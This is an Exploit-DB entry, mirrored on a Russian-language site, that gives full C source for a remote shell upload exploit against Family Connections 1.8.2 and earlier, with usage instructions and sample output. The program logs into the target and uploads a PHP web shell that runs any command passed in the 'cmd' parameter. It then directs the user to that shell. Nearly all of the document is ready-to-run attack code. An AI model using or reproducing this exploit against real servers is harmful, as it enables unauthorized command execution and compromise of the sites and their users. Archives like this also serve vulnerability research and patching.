- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8349
- Проверка EDB
-
- Пройдено
- Автор
- SALVATORE FRESTA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-04-03
C:
/*
Family Connections <= 1.8.2 - Remote Shell Upload Exploit
Author: Salvatore "drosophila" Fresta
Contact: [email protected]
Date: 3 April 2009
The following software will upload a simple php shell.
To execute remote commands, you must open the file
using a browser.
gcc rsue.c -o rsue
./rsue localhost /fcms/ user password
[*] Connecting...
[+] Connected
[*] Send login...
[+] Login Successful
[+] Uploading...
[+] Shell uploaded
[+] Connection closed
Open your browser and go to http://localhost/fcms/gallery/documents/shell.php?cmd=[commands]
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
sock.sin_addr = *((struct in_addr *)host->h_addr);
if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
return fd;
}
int socket_send(int socket, char *buffer, size_t size) {
if(socket < 0) return -1;
return write(socket, buffer, size) < 0 ? -1 : 0;
}
char *socket_receive(int socket, int tout) {
fd_set input;
int ret, byte;
char *buffer, *tmp;
struct timeval timeout;
FD_ZERO(&input);
FD_SET(socket, &input);
if(tout > 0) {
timeout.tv_sec = tout;
timeout.tv_usec = 0;
}
if(socket < 0) return NULL;
if(!(buffer = (char *) calloc (0, sizeof (char)))) return NULL;
while (1) {
if(tout > 0)
ret = select(socket + 1, &input, NULL, NULL, &timeout);
else
ret = select(socket + 1, &input, NULL, NULL, NULL);
if (!ret) break;
if (ret < 0) return NULL;
if(!(tmp = (char *) calloc (1024, sizeof (char)))) return NULL;
if ((byte=read(socket, tmp, 1024)) < 0) return NULL;
if(!byte) break;
if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen (tmp)))) return NULL;
strncat(buffer, tmp, strlen(buffer)+strlen(tmp));
}
return buffer;
}
void usage(char *bn) {
printf("\nFamily Connections <= 1.8.2 - Remote Shell Upload Exploit\n"
"Author: Salvatore \"drosophila\" Fresta\n\n"
"usage: %s <server> <path> <username> <password>\n"
"example: %s localhost /fcms/ admin 123456\n\n", bn, bn);
}
int main(int argc, char *argv[]) {
int sd;
char code[] = "--AaB03x\r\n"
"Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
"Content-Type: text/plain\r\n"
"\r\n"
"<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; name=\"desc\"\r\n"
"\r\n"
"description\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; name=\"submitadd\"\r\n"
"\r\n"
"Submit\r\n"
"--AaB03x--\r\n",
*buffer = NULL,
*rec = NULL,
*session = NULL;
if(argc < 5) {
usage(argv[0]);
return -1;
}
if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char)))) {
perror("calloc");
return -1;
}
sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login", argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]);
printf("\n[*] Connecting...");
if((sd = socket_connect(argv[1], 80)) < 0) {
printf("[-] Connection failed!\n\n");
free(buffer);
return -1;
}
printf("\n[+] Connected"
"\n[*] Send login...");
if(socket_send(sd, buffer, strlen(buffer)) < 0) {
printf("[-] Sending failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!(rec = socket_receive(sd, 0))) {
printf("[-] Receive failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!strstr(rec, "Login Successful")) {
printf("\n[-] Login Incorrect!\n\n");
free(buffer);
close(sd);
return -1;
}
session = strstr(rec, "PHPSESSID");
session = strtok(session, ";");
if((sd = socket_connect(argv[1], 80)) < 0) {
printf("[-] Connection failed!\n\n");
free(buffer);
return -1;
}
printf("\n[+] Login Successful"
"\n[+] Uploading...");
sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n"
"Host: %s\r\n"
"Cookie: %s\r\n"
"Content-type: multipart/form-data, boundary=AaB03x\r\n"
"Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session, strlen(code), code);
if(socket_send(sd, buffer, strlen(buffer)) < 0) {
printf("[-] Sending failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!(rec = socket_receive(sd, 0))) {
printf("[-] Receive failed!\n\n");
free(buffer);
close(sd);
return -1;
}
if(!strstr(rec, "Uploaded Successfully")) {
printf("\n[-] Upload failed!\n\n");
free(buffer);
close(sd);
return -1;
}
free(buffer);
close(sd);
printf("\n[+] Shell uploaded"
"\n[+] Connection closed\n\n"
"Open your browser and go to http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1], argv[2]);
return 0;
}
// milw0rm.com [2009-04-03]- Источник
- www.exploit-db.com
